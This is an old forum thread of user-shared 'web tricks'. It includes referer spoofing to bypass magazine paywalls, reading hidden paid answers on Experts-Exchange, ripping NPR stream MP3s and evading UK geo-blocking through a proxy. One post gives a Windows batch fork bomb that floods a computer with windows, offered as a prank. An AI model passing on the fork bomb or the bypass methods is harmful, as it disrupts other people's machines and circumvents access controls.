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#1 |
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noli me tangere
Join Date: May 2005
Location: 1-610-887-6072
Posts: 319
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This thread is for posting silly little ?web tricks? you come across that may prove to be handy for one thing or another. Feel free to share anything you feel would be useful :).
To start off, here?s an easy way to get free access to all of the articles from Computer Power User, PC Today, and Smart Computing magazines: If you?ve ever tried reading an article from a back issue of Computer Power User, PC Today, Smart Computing, or a few other Sandhills publications, you?ve probably noticed that the article gets cut off just a few paragraphs in, with a nag message informing you that you can have access to the full article if you?re a subscriber, ?To view the full text of any article published in Smart Computing, PC Today, or Computer Power User magazine, you must be a paid subscriber to one of these publications??. Well, fuck that shit. Let?s see if we can get the articles for free. Pick out an article from one of the aforementioned magazines (see computerpoweruser.com/editorial/isslist.asp for a full list). For this example, we?ll use this article: computerpoweruser.com/editorial/article.asp?article=articles/archive/c0702/45c02/45c02.asp (which is full of, (in)appropriately enough, references to free educational sites). If you select a random phrase from the available article excerpt (before the subscription nag notice), and then do a Google search for it (say, http://www.google.com/search?q=%22He...+free+stuff%22 in our example), you?ll find that one of the hits is a link back to the same article, at the same URL. However, if you click on that article link from the Google search results page, you?ll find that the article now opens up in its entirety :). Sure, you can now start plugging in phrases from the articles you want to read into Google, or you can just spoof your HTTP referer field to say www.google.com. There?s a countless number of programs and browser plug-ins to spoof your HTTP referer field, so search around and pick one. A simple program to do the trick (if you use Internet Explorer as your browser) is Wolfman?s Zspoof, available at http://wolfman.deny.de. Simply plug in the desired article?s URL (though go ahead and delete any of the ?&guid=?? stuff which may appear in the end, as it?s not necessary, so your article URL should end in ?.asp?) into the Target field of Zspoof, and www.google.com into the Ref field, and hit Spoof. If you picked out a bunch of articles, and want to be able to access them all at once, you can hit the Add Many button in Zspoof, and then paste them all in (Zspoof will then open as many browser windows as there are articles). And there you have it, a simple way to access all of the articles from Computer Power User, PC Today, and Smart Computing?at least for now. Oh, and don?t forget to use a proxy ;). Know of any other magazine sites that this trick will work on?
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Under the pleasant norms of Parisian life, beneath the veneer of culture and civilisation, one of the bitterest and most sadistic underground wars of modern history was fought out. |
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#2 |
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Entrepreneur
Join Date: Jun 2006
Location: Earth, same as you... hopefully.
Posts: 2,849
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I dunno if this is in line with your thread, but www.BugMeNot.com is useful, and might have some of the info you're looking for. It's mainly a site for logins, but porn sites are banned.
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#3 |
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Rorta n00b
Join Date: Aug 2007
Posts: 1
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Ok, this one definately fits into the category! I search Google for any question I have and I reguraly end up at experts-exchange.com. Only a few of my answers have ever come from there. Any way, they show you the question but make you pay to see the replies and answers. They do this by scrambling the text in the replies and an image telling you to pay to see it when you roll over one...
The following URL is a good example: http://www.experts-exchange.com/Hard..._20896351.html Well, I was bored on day and decided to see if I could crack the solutions, so I viewed the source and was scrolling through it when all of a sudden I saw clear text again. All the scrambled replies are at the top and their unscrambled versions at the bottom being hidden by css and javascript. So, to view ANY of the replies (so far it's worked on EVERY page I looked at), just view the source and scroll down until the text becomes readable again! What a stupid way to try and protect the answers to get you to sign up.. What's even worse, is that they probably paid someone (or several people) for that code. PLUS they are supposed to be EXPERTS (experts-exchange.com)!!! Some experts.. P.S. Sorry for my poor forum etiquite, I forgot to introduce myself... I am a 29 year old web developer/programmer/moderate hacker.. I have been working with computers since I was 12 and no one ever heard of the internet. I am very well versed in PERL/CGI, PHP, HTML, JAVASCRIPT, CSS and am able to quickly pick-up and learn most programming languages. They're all pretty much the same, they just use different terminology and methods to accomplish the same tasks. It's like learning a foreign language, but much more fun because you can more with it! Any way, I am a life long learner and just love to get my hands dirty with new and interesting projects/hacks.. I just learned of this forum, and hope I can make it a regular stop for me and can contribute to the community. Hacking is more than just a fun diversion or rebelious activity, it's a lifestyle and a bond between like-minded individuals that promotes the ideas of sharing, exploration and determination that most of the world is lacking today! FireStorm69 Last edited by FireStorm69; 10th August 2007 at 03:08 PM. |
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#4 |
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$war = (!empty($iraqi_oil)) ? 'yes' : 'no'
Join Date: May 2005
Posts: 1,189
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Hey, welcome to Rorta, FireStorm69.
I've seen that experts-exchange crap and it's fucking annoying, but never bothered to try and crack it 'cos the answer can usually be found somewhere else anyway. Nice trick though. |
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#5 |
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Entrepreneur
Join Date: Jun 2006
Location: Earth, same as you... hopefully.
Posts: 2,849
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Never heard of Expert's Exchange...
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#6 |
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Rorta n00b
Join Date: Aug 2007
Posts: 6
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i have seen experts exchange many times. you know how it is. you have a problem, you google it and aha! someone else has asked the same question. click the link and oh no! its experts exchange.
i would never pay for it so this is very useful for me. cheers |
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#7 |
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noli me tangere
Join Date: May 2005
Location: 1-610-887-6072
Posts: 319
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Youtube Tricks...in FAQ form!
Huge thanks to everyone who came up with the methods, I just list them...
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Under the pleasant norms of Parisian life, beneath the veneer of culture and civilisation, one of the bitterest and most sadistic underground wars of modern history was fought out. Last edited by DIzzIE; 28th October 2007 at 07:44 AM. |
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#8 |
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Rorta n00b
Join Date: Jan 2008
Posts: 2
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You da man Dizzie... Thanx for the youtube trix...
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#9 |
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noli me tangere
Join Date: May 2005
Location: 1-610-887-6072
Posts: 319
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The Virtues of Printer-Friendly Links
You may have noticed that lots of websites, particularly news sites, nowadays have very little actual content and lots of fluff that consists of advertising, wasteful spacing and formatting, and other extraneous garble that detracts from the article you're trying to read. The good news is that most news sites now have the ability to view a 'printer friendly' version of the page that typically provides no annoying formatting, fewer or no ads, and no irritating side-bars or menu-items; in other words, just the article. Look around the top or the bottom edges of the news-story page for either a link that says 'printer friendly.' 'printable format,' or something of that ilk, and/or has a little icon of a printer on it. Click that link, and then whenever you share the URL to the news-story, be sure to link to that printer-friendly link instead of the standard one. If you get a long ugly link, use a URL-shortening service like tinyurl or snipurl to compact the URL. You can help encourage others to give pf-links by refusing to click on any non-pf links when a pf alternative is available. Since the format for a pf-URL is generally the same for each news site (see the few examples below), perhaps someone can script some sort of automated tool to generate pf-links on the fly and make this a bit easier. But for now, just be sure to always hand out pf-links in lieu of the standard ones and help everyone not only save bandwidth, but prevent them from being exposed to potentially malicious advertising and just plain wasteful formatting. Remember that if you?re sharing a link with someone you obviously want them to click on it, so it stands to reason that you would provide a link that others would actually click on? A few examples to compare: Bad: http://news.yahoo.com/s/ap/20080327/...as/china_tibet Better: http://news.yahoo.com/s/ap/20080327/...ibet&printer=1 Bad: http://www.theregister.co.uk/2008/03...ow_terminal_5/ Better: http://www.theregister.co.uk/2008/03...l_5/print.html Bad: http://www.cnn.com/2008/US/03/27/pri...rds/index.html Better: http://tinyurl.com/3yqf4e
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Under the pleasant norms of Parisian life, beneath the veneer of culture and civilisation, one of the bitterest and most sadistic underground wars of modern history was fought out. |
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#10 |
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Entrepreneur
Join Date: Jun 2006
Location: Earth, same as you... hopefully.
Posts: 2,849
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Is there a method of using Google to search for PF hits?
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#11 |
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noli me tangere
Join Date: May 2005
Location: 1-610-887-6072
Posts: 319
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Hrmm, I don't think there's a full-proof one, but you could try adding 'inurl:print' to the end of your Google query (for example: '"title of the article you're looking for" inurl:print'), since lots--but not all--of the PF links have 'print' in their URL.
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Under the pleasant norms of Parisian life, beneath the veneer of culture and civilisation, one of the bitterest and most sadistic underground wars of modern history was fought out. |
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#12 |
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noli me tangere
Join Date: May 2005
Location: 1-610-887-6072
Posts: 319
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How to Rip NPR MP3s.
National Public Radio (NPR) is a popular radio show syndicator in the US. You can listen to lots of their shows online, but while they now do offer 'podcasts' and other downloadable content, many of the programs are only officially available as streaming content, with no link to download the source MP3. Well fuck that, let's rip their shit. You can of course, use a sound-capturing program like SoundTap (or many others) to record all sound coming out of your computer, but this will result in lossier sound quality, so instead let's rip the original MP3 file (64 Kbps, 44 KHz) that's streamed in NPR's flash player. 1. Head on over to the NPR Archives and pick a program to rip. For this example we will be using http://www.npr.org/templates/story/story.php?storyId=4167689 , though the method should work for other shows in much the same way. 2. Now just take the storyId number from the first URL (4167689 in our example), and insert it after the id= field in this second URL, like so: http://www.npr.org/templates/xanadu/xplayer.php?id=4167689&t=1 . 3. Paste the second URL into your browser, and you should get an xplayer.xml file. (The XML file will either open in your browser or you'll be prompted to save it). At the top of the XML file should be a <mediaUrl> field that looks something like this: Code:
<mediaUrl> /npr/atc/2004/11/20041112_atc_09.mp3?primaryTopic=1039&assignedTopics=1041,1045,1047,1011&orgId=1 </mediaUrl> 5. Now simply append the mediaUrl value to the end of the aforementioned URL (stripping out all the extraneous bullshit after .mp3). So your download URL for this show episode should be: http://download.npr.org/anon.npr-mp3/npr/atc/2004/11/20041112_atc_09.mp3 . And there you have it. You should now be able to download the original MP3s (64 Kbps, 44 KHz) of your favourite shows to your heart's content. The general process is simple: get the storyId from the first URL, paste it into the second URL, get the location of the MP3 from the XML file that the second URL points to, and finally append the MP3 location to the third URL. Easy as 1-2-3-4 .
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Under the pleasant norms of Parisian life, beneath the veneer of culture and civilisation, one of the bitterest and most sadistic underground wars of modern history was fought out. Last edited by DIzzIE; 31st March 2008 at 05:59 AM. |
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#13 |
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Rorta n00b
Join Date: Jul 2008
Posts: 2
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I found a way to view videos on www.southparkstudios.com (using firefox) in the UK where videos currently will not show due to boradcasting rights etc.
1. Go to http://www.atomintersoft.com/free_socks5_proxy_list and find a proxy that is in the USA. If it doesnt actually specify that its in the USA if the url ends in comcast.net then it will be a USA proxy. 2. Copy the IP and port which is in this format for example 76.27.113.101:57497 3. Go to the Tools tab on firefox browser > Options > Advanced > Network > Click Settings under Connection and check the manual proxy configuration circle. 4. Where it says SOCKS host fill in the boxes as necessary (remember the IP:Port format) and make sure the SOCKS v5 circle is checked. 5. Now save these settings and load http://www.southparkstudios.com/guide/1002/ If you get an error just refresh until it loads (it will load very slowly) and then press "Watch this full episode". The player will load but not properly because it cant load the flash properly with the proxy so you close the player go back to your proxy settings remove the information you filled in and check the "No proxy circle" 6. Press "Watch this full episode" again and the player will load fully because it still recognises you as being on the Proxy IP and you can now wach any south park episode free online. Last edited by XmasComes; 25th July 2008 at 05:26 PM. |
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#14 | |
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Entrepreneur
Join Date: Jun 2006
Location: Earth, same as you... hopefully.
Posts: 2,849
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Quote:
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#15 |
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Rorta n00b
Join Date: Jul 2008
Posts: 2
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Lol ok well in England you cant, so that method will work for people who want to view in England.
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#16 |
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Rorta Regular
Join Date: Jun 2008
Posts: 421
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How do i download videos off of theync.com?im thinking same way.
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#17 |
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Rorta Regular
Join Date: Aug 2008
Posts: 136
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vixy.net is a pretty good place to download the youtube videos.
and if you find a video performance of a song you just have to have, www.vid2mp3.com is amazing for that. Works amazingly fast every time. |
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#18 |
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Rorta n00b
Join Date: May 2009
Location: 73(-) |0u
Posts: 4
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Re: Silly Web Tricks
I just started findin this stuff so its somethin I can understand so its not that adavanced but....
It's just a spam thing that as far as i know doesnt mess up ur computer just slows it down Open up notepad when u click on it, it constantly keeps opening new windows and the only way to stop is turn off ur computer(but i just took out my FD and it stopped and deleted the group. :type ur message here:Fork.bat :s start% "Fork.bat" goto s or If you wont it to just run the same message over and over again... :type message here:Fork.bat :s start%o "Fork.bat" goto s IF SOMETHING DOES HAPPEN DONT BLAME ME UR THE DUMBASS THAT TRIED IT AND GOT FUCKED UP (nothing happened to me though but it got realy fucked up at like 218 windows)
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]-[3Я3?|λЯ?]-[ 7219932]-[32371( |
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#19 |
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Rorta n00b
Join Date: Jun 2009
Posts: 1
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Interesting Information
Hi, good post. I have been wondering about this issue,so thanks for posting.
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#20 |
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Join Date: Oct 2008
Posts: 95
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Re: Silly Web Tricks
Edit a pages html by pasting this into your address bar and hitting enter:
javascript:document.body.contentEditable%20=%20'tr ue';%20document.designMode='on';%20void%200 Of course it doesnt affect anyone's page except yours. Refresh to turn editing mode off. Hmm, when I go to edit this post there is no space in true. But it shows there is in the normal view, get rid of the space for the code to work.
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Obama and Bush... different puppets, same strings. - Tarnak Last edited by s480; 4th September 2010 at 11:05 PM. |
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